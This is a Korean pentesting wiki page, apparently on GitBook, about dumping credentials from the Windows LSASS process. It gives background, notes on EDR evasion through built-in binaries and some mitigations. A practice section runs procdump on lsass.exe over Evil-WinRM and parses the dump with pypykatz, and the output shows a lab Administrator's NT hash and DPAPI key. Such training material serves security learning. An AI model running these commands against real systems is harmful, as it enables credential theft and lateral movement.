펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Golden Ticket
    • Registry Run Keys
    • Scheduled Tasks
    • WMI Event Subscription
    • SSH Key Injection
    • DC Shadow
    • DLL Hijacking
    • DLL SideLoading
    • Create Account
    • RID Hijacking
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Ticket
      • KrbRelayUp
    • Windows
      • SeImpersonatePrivilege
      • UAC Bypass
      • Unquoted Service Path
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
    • Linux
      • cron
      • Kernel Exploits
      • sudo
      • SUID
      • Capabilities
      • PATH
      • polkit-agent-helper
      • checkpoint
      • no root squash
      • Dirty Pipe
  • 민감정보 탈취
    • Active Directory
      • DCSync
      • LSASS
      • AS-REP-Roasting
      • AS Requested Service Tickets
      • Kerberoasting
      • Targeted Kerberoast
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
    • Windows
      • Unattended File
      • Browser Stored Credentials
      • NTLM Relay
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Port Forwarding
    • SMB/Windows Admin Shares
    • RDP
    • DCOM
    • WinRM
    • Domain Trust Discovery
  • ETC
    • CS
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
    • Tools
      • BloodHound
      • Certipy-ad
      • LDAP Search
      • Hydra
Powered by GitBook
On this page
  • Practice
  • References

Was this helpful?

Export as PDF
  1. 민감정보 탈취
  2. Active Directory

LSASS

Windows 10 이후로는 LSASS.exe의 메모리가 가상화 되어

최신 버전의 Windows에서는 메모리 덤프가 불가능합니다.

LSASS(Local Security Authority Subsystem Service)는 Windows 운영체제라면

기본적으로 존재하는 Microsoft에서 제공하는 서비스이며

이것을 통해 메모리를 덤핑하기 위해선 관리자 권한이 필요합니다.

사용자가 컴퓨터에 로그인을 성공하면 자격증명이 생성되고, 이는 메모리의 LSASS에 저장됩니다.

때문에 LSASS 메모리 덤프에 성공한다면 로그인에 성공했던 모든 사용자들의

NT Hash 정보를 가져올 수 있게 되고, 이것은 곧 권한 상승을 가능케 합니다.

오늘날까지 공격자들은 taskmgr.exe, procdump.exe, comsvc.dll과 같은

LOLBin(Libing Off Land Binaries)을 사용한 자격증명 덤핑을 선호하고 있습니다.

그런 이유는 이것들이 기본적으로 Windows 내장 기능을 이용하기 때문에

바이러스 백신이나 EDR 솔루션에 탐지될 가능성이 낮고 흔적이 덜 남기 때문입니다.

공격자에 의해 실행되거나 백업한 lsass 관련 파일 등이 공격자에게 노출된다면

시스템 내부의 모든 NT Hash 정보들이 유출되는 파장이 있음에도 필요한 이유는

이것이 Windows의 시스템 보안와 관련된 핵심 프로세스이기 때문입니다.

따라서 보안 강화를 위해서는 접근할 수 있는 관리자 권한을 최소화하며

Credential Guard, Protected Process Light 등의 기능을 사용할 수 있습니다.

Practice

실습을 위해서 Microsoft에서 제공하는 ProcDump 도구를 다운받습니다.

.\procdump.exe -ma -accepteula lsass.exe lsass.dmp

ProcDump를 사용하여 메모리 덤프를 시작합니다.

*Evil-WinRM* PS C:\Windows\system32> .\procdump.exe -ma -accepteula lsass.exe lsass.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[12:39:32] Dump 1 initiated: C:\Windows\system32\lsass.dmp
[12:39:33] Dump 1 writing: Estimated dump file size is 160 MB.
[12:39:33] Dump 1 complete: 160 MB written in 0.8 seconds
[12:39:33] Dump count reached.

덤핑 결과값인 lsass.dmp 파일을 로컬로 가져와서 pypykatz를 통해 분석하면

사용자 NT Hash, DPAPI 등의 정보를 확보할 수 있습니다.

┌──(root㉿kali)-[~/Pentest/Machine]                                                                                                                                              
└─# pypykatz lsa minidump lsass.dmp 
...
== LogonSession ==                                                                                                                                                               
authentication_id 576371 (8cb73)                                                                                                                                                 
session_id 1                                                                                                                                                                     
username Administrator                                                                                                                                                           
domainname BLACKFIELD                                                                                                                                                            
logon_server DC01                                                                                                                                                                
logon_time 2024-11-07T17:59:12.813343+00:00                                                                                                                                      
sid S-1-5-21-4194615774-2175524697-3563712290-500                                                                                                                                
luid 576371                                                                             
        == MSV ==                                                                                                                                                                
                Username: Administrator                                                 
                Domain: BLACKFIELD                                                                                                                                               
                LM: NA                                                                                                                                                           
                NT: 184fb5e5178480be64824d4cd53b99ee                                                                                                                             
                SHA1: 7d37f44d9e27fcc75ecb1e7ac9f34f0f18a83f5e                                                                                                                   
                DPAPI: 3fea2a21284fb5cf053ae8be1fab2ead00000000                                                                                                                  
        == WDIGEST [8cb73]==                                                                                                                                                     
                username Administrator                                                                                                                                           
                domainname BLACKFIELD                                                   
                password None                                                                                                                                                    
                password (hex)                                                          
        == Kerberos ==                                                                                                                                                           
                Username: Administrator                                                                                                                                          
                Domain: BLACKFIELD.LOCAL

References

PreviousDCSyncNextAS-REP-Roasting

Last updated 5 months ago

Was this helpful?

LogoProcDump - SysinternalsMicrosoftLearn
LogoProcDump - SysinternalsMicrosoftLearn
LogoLocal Security Authority Subsystem ServiceWikipedia
LogoEDR을 이용한 다양한 LSASS 자격 증명 덤핑 방식들 탐지 - ASECASEC
Logo(주) 싸이버원